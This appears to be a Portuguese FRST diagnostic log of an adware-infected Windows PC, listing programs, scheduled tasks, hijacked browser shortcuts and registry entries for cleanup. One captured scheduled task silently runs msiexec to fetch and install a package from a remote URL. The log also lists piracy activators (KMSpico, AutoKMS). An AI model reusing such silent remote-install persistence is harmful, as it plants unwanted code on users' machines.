Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23506 (HKLM-x32\...\{3ee5e5bb-b7cc-4556-8861-a00a82977d6c}) (Version: 14.0.23506.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 - ENU (HKLM-x32\...\{AA4A4B2C-0465-3CF8-BA76-27A027D8ACAB}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 Runtime (HKLM-x32\...\{299C0434-4F4E-341F-A916-4E07AEB35E79}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2012 (HKLM-x32\...\{89ca2a32-2b52-4595-8dfd-6fe4757958d0}) (Version: 11.0.51108 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2015 (HKLM-x32\...\{dd8b09df-3ef8-49f1-bd1a-65278435860b}) (Version: 14.0.23217 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 47.0.2 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 47.0.2 (x86 pt-BR)) (Version: 47.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 47.0.2.6148 - Mozilla)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.8.3 - Notepad++ Team)
OCR Software by I.R.I.S. 13.0 (HKLM\...\HPOCR) (Version: 13.0 - HP)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.4266.1003 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.4266.1003 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.4266.1003 - Microsoft Corporation) Hidden
Office 2016 KMS Activator Ultimate v1.1 Final (HKLM\...\Office 2016 KMS Activator Ultimate v1.1 Final_is1) (Version: v1.1 Final - )
Office Mix (HKLM-x32\...\{445f330d-1beb-45a2-932d-9b0ba0718259}) (Version: 0.1.3641.0 - Microsoft Corporation)
Office Mix 64-bit (Version: 0.1.3641.0 - Microsoft) Hidden
Opera Neon (HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\Opera Neon) (Version: 1.0.2459.0 - Opera Software AS)
Origin 2016 (HKLM-x32\...\{DC460501-EEFA-4701-8AD8-5F7DE1B70436}) (Version: 9.30.00 - OriginLab Corporation)
Pacote de Driver do Windows - Hewlett-Packard hp scanjet 3600 series (04/26/2007 9.0.0.0) (HKLM\...\6AF27CD11B617BED2F81E26729D33AF8338D453C) (Version: 04/26/2007 9.0.0.0 - Hewlett-Packard)
Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation)
Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x64 Hosting Support - PTB (Version: 11.0.51108 - Microsoft Corporation) Hidden
Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x86 Hosting Support - PTB (x32 Version: 11.0.51108 - Microsoft Corporation) Hidden
PDF Architect 3 (HKLM-x32\...\PDF Architect 3) (Version: 3.1.1.24880 - pdfforge GmbH)
PDF Architect 3 Create Module (x32 Version: 3.1.1.24851 - pdfforge GmbH) Hidden
PDF Architect 3 Edit Module (x32 Version: 3.1.1.24851 - pdfforge GmbH) Hidden
PDF Architect 3 View Module (x32 Version: 3.1.1.24851 - pdfforge GmbH) Hidden
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.1.2 - pdfforge)
PhotoScape (HKLM-x32\...\PhotoScape) (Version: - )
Pro Evolution Soccer 2015 (HKLM-x32\...\UHJvRXZvbHV0aW9uU29jY2VyMjAxNQ==_is1) (Version: 1 - )
Pro Evolution Soccer 2016 (HKLM-x32\...\UHJvRXZvbHV0aW9uU29jY2VyMjAxNg==_is1) (Version: 1 - )
QGIS 2.18 2.18.3 Las Palmas (HKLM\...\QGIS 2.18) (Version: - QGIS Development Team)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.222 - Qualcomm Atheros Communications)
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.005 - Dell Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7544 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.2.8400.39034 - Realtek Semiconductor Corp.)
Recovery for Word 5.0.19634.2 Demo License (HKLM-x32\...\{435D8742-8812-4BB0-8A96-09779291F367}) (Version: 5.0.19634.2 - Recoveronix)
Recuva (HKLM\...\Recuva) (Version: 1.51 - Piriform)
ResearchSoft Direct Export Helper (HKLM-x32\...\ResearchSoft Direct Export Helper) (Version: - Thomson Reuters)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Scan (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
SHAREit (HKLM-x32\...\SHAREit_is1) (Version: 3.3.0.658 - Lenovo)
Skype™ 7.18 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.18.112 - Skype Technologies S.A.)
SolutionCenter (x32 Version: 130.0.369.000 - Hewlett-Packard) Hidden
Switch Sound File Converter (HKLM-x32\...\Switch) (Version: 5.00 - NCH Software)
TagScanner 6.0.17 (HKLM-x32\...\TagScanner_is1) (Version: - Sergey Serkov)
trotux - Uninstall (HKLM-x32\...\{88B52141-2F3E-4021-BCE2-9D3316919A24}) (Version: - ) <==== ATENÇÃO
Update_msi (HKLM-x32\...\{59B5A9CD-253D-4C41-A073-B387D4C9672D}) (Version: 1.0.0 - Default Company Name)
USB Network Driver (HKLM-x32\...\{66ED8E01-C915-41F5-B33E-C5C31F27B885}) (Version: 2007.07.3 - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Warsaw 1.14.2.35 64 bits (HKLM\...\{20E60725-16C8-4FB9-8BC2-AF92C5F8D06D}_is1) (Version: 1.14.2.35 - GAS Tecnologia)
WebReg (x32 Version: 130.0.128.017 - Hewlett-Packard) Hidden
WinCcac version 1.08 (HKLM-x32\...\{3929C447-1A74-4E71-8F58-D1399D31FB57}_is1) (Version: 1.08 - Fuat YAVUZ)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
WinSnare (HKLM-x32\...\{DCC2A107-6E2C-4CEE-9E61-E790A742A938}) (Version: 4.3.6 - WinSnare) <==== ATENÇÃO
Yahoo Search Set (HKLM-x32\...\Yahoo! SearchSet) (Version: - Yahoo Inc.)
Your Software Deals 1.0.0 (HKLM-x32\...\Your Software Deals_is1) (Version: 1.0.0 - Ashampoo GmbH & Co. KG) <==== ATENÇÃO
Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x64) - RUS (Version: 11.0.51108 - Microsoft Corporation) Hidden
Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x86) - RUS (x32 Version: 11.0.51108 - Microsoft Corporation) Hidden
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\ChromeHTML: -> <==== ATENÇÃO
CustomCLSID: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {049CE5DD-872E-4E9A-8EE0-45B619D6C47E} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {156DC3EA-6754-45F6-9298-4287A6A1CC55} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2015-08-16] (Microsoft Corporation)
Task: {3469F03C-A1FA-4077-A541-3905E394E33D} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe
Task: {429D8E40-1740-4527-9750-81524478D34E} - System32\Tasks\{DFA9A8EA-D0E0-49DF-9F80-27FFC21FEF2C} => pcalua.exe -a "c:\Program Files\Corel\CorelDRAW Graphics Suite X7\Setup\SetupARP.exe" -c /arp
Task: {4D22FC05-8DFE-4633-8621-72055A1B661A} - System32\Tasks\Microsoft\Windows\Windows Activation Technologies\OatTask => "%Systemdrive%\Office Activation Technologies\Install.cmd"
Task: {52782B91-6A00-4CB6-93EF-EDEC17C89972} - System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel => C:\Program Files (x86)\BikaQRss\BikaQ.exe [2017-03-21] (IEC) <==== ATENÇÃO
Task: {53240F28-51EC-4345-8EC4-F8393BC081B5} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
Task: {58E61532-20DF-481F-862F-9E46427DDFC5} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-03-14] (Microsoft Corporation)
Task: {5BDD7616-B688-435F-8314-C63D2C923E0E} - System32\Tasks\Sheneghtcumele Launcher => C:\Program Files (x86)\Qitech\xgudik.exe [2017-03-20] (Glarysoft Ltd)
Task: {5E55410E-092B-408A-B17D-0021D31CBAF8} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2015-08-16] (Microsoft Corporation)
Task: {6763BF05-FA49-4E19-BE40-687B856A76B7} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {6763EB52-2762-4078-85CB-8F90875A6729} - \WPD\SqmUpload_S-1-5-21-2306744415-2254712149-2456193828-1001 -> Nenhum Arquivo <==== ATENÇÃO
Task: {6A5BCC93-500E-412F-B89C-664C156B8A2C} - System32\Tasks\Sthiwardnerzodom => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364&v=20170320 /q <==== ATENÇÃO
Task: {74EC66E7-37EC-4A5F-9C56-41851A625603} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\Dell\SupportAssist\sessionchecker.exe
Task: {77920801-9815-4E2A-87E0-40DADEF5CE5D} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {81544C52-954E-4CBC-99B8-D5C0C40813E3} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2016-08-15] (Microsoft Corporation)
Task: {86D636C2-79DE-4ABB-96BB-B769ED9C1267} - System32\Tasks\CorelUpdateHelperTaskCore => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [2016-02-26] (Corel Corporation)
Task: {86EF363D-1008-4F6E-811F-EA8CA1E2E7ED} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [2016-12-09] (McAfee, Inc.)
Task: {8934918A-F5F3-4477-961E-77D1BE4A18B7} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Nenhum Arquivo <==== ATENÇÃO
Task: {9143828E-D5AF-4967-865C-D44107DFF107} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\Dell\SupportAssist\uaclauncher.exe
Task: {9393BEB2-3B77-46ED-9C68-543A7A23E352} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {9F91D2F1-10AC-47BA-BC07-601D149F8358} - System32\Tasks\{F2936E74-CE3B-4544-BFAF-2342EB95F4A4} => pcalua.exe -a "C:\Program Files (x86)\Baidu-Security-2014-4.4.4.73687\Baidu Antivirus\Uninstall.exe"
Task: {A1284E52-F3C8-474E-980C-84BAE843CBAB} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
Task: {A2D69333-B10A-419F-ACDB-9EA3C2FC7851} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => %ProgramFiles(x86)%\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe
Task: {A4F839CE-A988-408A-92BE-4DEFFF99F6CE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {A733693F-A4B0-4A23-B45C-FB858DC062AD} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2016-08-15] (Microsoft Corporation)
Task: {AE842209-C15D-4537-939F-7AA261B4FA5E} - System32\Tasks\Dell SupportAssistAgent AutoUpdate => C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssist.exe [2015-04-10] (Dell Inc.)
Task: {BB2B6860-5991-434A-A6DF-FA92EB5839C4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Nenhum Arquivo <==== ATENÇÃO
Task: {C42B228A-36B7-4143-86B7-848FE6ACFA4D} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-03-14] (Adobe Systems Incorporated)
Task: {C57EED74-F9DE-4D95-B7B4-15E32F045C20} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] ()
Task: {C72404D5-D411-4862-976E-9A433CE65548} - System32\Tasks\{CA34AB4C-4FEA-4FF2-9557-71CF62B74ED6} => pcalua.exe -a "C:\Program Files (x86)\Pro Evolution Soccer 2015\PES2015.exe" -d "C:\Program Files (x86)\Pro Evolution Soccer 2015"
Task: {E170DDC3-6169-4B0A-9D51-8F1EA66F6685} - System32\Tasks\AutoPico Daily Restart => C:\Program Files\KMSpico\AutoPico.exe [2015-08-16] (@ByELDI)
Task: {E745A882-7BCA-4253-9FB5-236D02F01087} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {E75B7C93-0BBF-47CB-9D06-988305E6C712} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Nenhum Arquivo <==== ATENÇÃO
Task: {E8CE6B5C-1D10-44C2-A656-C8FAFAA226D6} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\1.50.1291.1\mcdatrep.exe [2017-02-07] (McAfee, Inc.)
Task: {F482182A-8054-4F72-A630-4B3E61540B35} - System32\Tasks\{B8175487-70A0-480E-8643-F19AFA6D1585} => pcalua.exe -a "C:\Program Files (x86)\Legendas-3.0\unins000.exe"
Task: {F6300785-F862-4B3E-9BFD-355AB51BE471} - System32\Tasks\R@1n-KMS\Office16ProPlus => wmic
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-2306744415-2254712149-2456193828-1001Core.job => C:\Users\Helder\AppData\Local\Facebook\Update\FacebookUpdate.exe
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
Shortcut: C:\Users\Helder\Favorites\NCH Software Download Site.lnk -> hxxp://www.nch.com.au/index.htm
ShortcutWithArgument: C:\Users\Helder\Desktop\firefox.exe - Atalho.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.startpageing123.com/?type=sc&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364
ShortcutWithArgument: C:\Users\Helder\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.startpageing123.com/?type=sc&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364
ShortcutWithArgument: C:\Users\Helder\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.startpageing123.com/?type=sc&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364
ShortcutWithArgument: C:\Users\Helder\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.startpageing123.com/?type=sc&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.delta-homes.com/?type=sc&ts=1415845442&from=wpm11123&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.startpageing123.com/?type=sc&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Your Software Deals.lnk -> C:\ProgramData\Ashampoo\YourDeals.exe () -> hxxp://linktarget.ashampoo.com/linktarget/?target=marketplace&edition=eid=11122&utm_medium=desktop&x-pos=Metro
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.startpageing123.com/?type=sc&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364
==================== Módulos Carregados (Whitelisted) ==============
2017-03-20 11:44 - 2017-03-20 11:44 - 00308224 _____ () C:\Program Files (x86)\Sheneghtcumele Launcher\local64spl.dll
2016-08-15 18:33 - 2015-08-16 00:21 - 00162880 _____ () C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll
2016-05-01 16:01 - 2016-01-23 07:10 - 01855488 _____ () C:\Program Files (x86)\Legendas-3.5\srvlegendas.exe
2016-07-16 08:42 - 2016-07-16 08:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2017-03-14 15:43 - 2017-03-04 04:19 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2017-03-14 15:43 - 2017-03-04 04:19 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2017-03-14 15:43 - 2017-03-04 03:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-14 15:43 - 2017-03-04 04:19 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2015-04-15 17:13 - 2015-04-15 17:13 - 00222720 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll
2016-09-15 17:53 - 2016-09-07 01:56 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-03-14 15:42 - 2017-03-04 03:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-03-14 15:43 - 2017-03-04 03:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-03-14 15:43 - 2017-03-04 03:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-03-14 15:43 - 2017-03-04 03:05 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-03-14 15:43 - 2017-03-04 03:05 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-03-14 15:43 - 2017-03-04 03:08 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-03-13 16:43 - 2017-03-13 16:48 - 00077312 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-03-13 16:43 - 2017-03-13 16:48 - 00182784 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-03-13 16:43 - 2017-03-13 16:48 - 41048064 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-03-13 16:43 - 2017-03-13 16:48 - 02236896 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\roottools.dll
2014-01-25 02:53 - 2012-06-25 09:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\gbpddfac64.sys:X5ZN8aGvT4 [2262]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\gbpddreg64.sys:X5ZN8aGvT4 [686]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\wsddfac.sys:X5ZN8aGXs4 [2410]
AlternateDataStreams: C:\ProgramData\GbPlugin:IncompleteStartGbprcm.cnt [10]
AlternateDataStreams: C:\ProgramData\Temp:862BDB1A [132]
AlternateDataStreams: C:\ProgramData\Temp:B755D674 [158]
AlternateDataStreams: C:\Users\Todos os Usuários\GbPlugin:IncompleteStartGbprcm.cnt [10]
AlternateDataStreams: C:\Users\Todos os Usuários\Temp:862BDB1A [132]
AlternateDataStreams: C:\Users\Todos os Usuários\Temp:B755D674 [158]
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ModuleCoreService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ModuleCoreService => ""="Service"
==================== Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)

==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
IE trusted site: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\bancobrasil.com.br -> www.bancobrasil.com.br
IE trusted site: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\bb.com.br -> hxxps://seg.bb.com.br
IE trusted site: HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\dell.com -> dell.com
==================== Hosts Conteúdo: ===============================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2013-08-22 10:25 - 2017-02-08 14:35 - 00000877 ____N C:\WINDOWS\system32\Drivers\etc\hosts

0.0.0.1 mssplus.mcafee.com
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Helder\Pictures\d51f9411-bf58-4d08-b92f-769ce4a593ac_0.jpg
DNS Servers: 192.168.1.1
